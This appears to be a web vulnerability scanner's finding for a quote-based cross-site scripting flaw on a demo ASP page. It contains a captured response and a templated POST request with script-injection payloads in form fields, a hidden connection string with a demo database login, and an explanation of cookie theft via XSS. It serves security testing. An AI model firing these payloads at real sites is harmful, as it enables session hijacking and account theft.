Content-Length: 381
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = >"><script>alert('XSS')</script></P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=<attack>>"><script>alert('XSS')</script></attack>&txtLastName=Swinney<script>alert\('XSS'\)<\/script>